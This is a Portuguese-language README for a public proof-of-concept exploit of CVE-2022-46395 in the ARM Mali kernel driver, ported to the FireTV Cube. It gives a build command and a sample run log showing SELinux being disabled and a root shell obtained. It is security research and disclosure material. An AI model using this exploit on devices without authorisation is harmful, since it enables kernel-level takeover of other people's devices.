
CVE-2022-46395 POC para FireTV 3ª geração Cube (gazelle)
Este é um fork do Pixel 6 POC do pesquisador de segurança Man Yue Mo para CVE-2022-46395. Leia sua análise detalhada da vulnerabilidade aqui. Foram feitas alterações para levar em conta o espaço de usuário de 32 bits do FireOS. O POC explora um bug no driver do kernel ARM Mali para obter execução arbitrária de código no kernel, que é então usada para desabilitar o SELinux e obter root.
O exploit foi corrigido no PS7664/3772 (Setembro de 2023). Para referência, o seguinte comando foi usado para compilar com clang no ndk-21:
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o gazelle_buf
Para resultados mais rápidos, execute após uma reinicialização recente. Em média, o POC leva de 20 a 60 segundos para obter root.
gazelle:/ $ /data/local/tmp/gazelle_buf
fingerprint: Amazon/gazelle/gazelle:9/PS7652.3564N/0028488625152:user/amz-p,release-keys
benchmark_time 102
failed after 100
finished reset: 919423975 fault: 918468559 3795 err 0 read 3
found pgd at page 8
overwrite addr : 104100558 558
overwrite addr : 104300558 558
overwrite addr : 10410082c 82c
overwrite addr : 10430082c 82c
result 50
success after 128
gazelle:/ #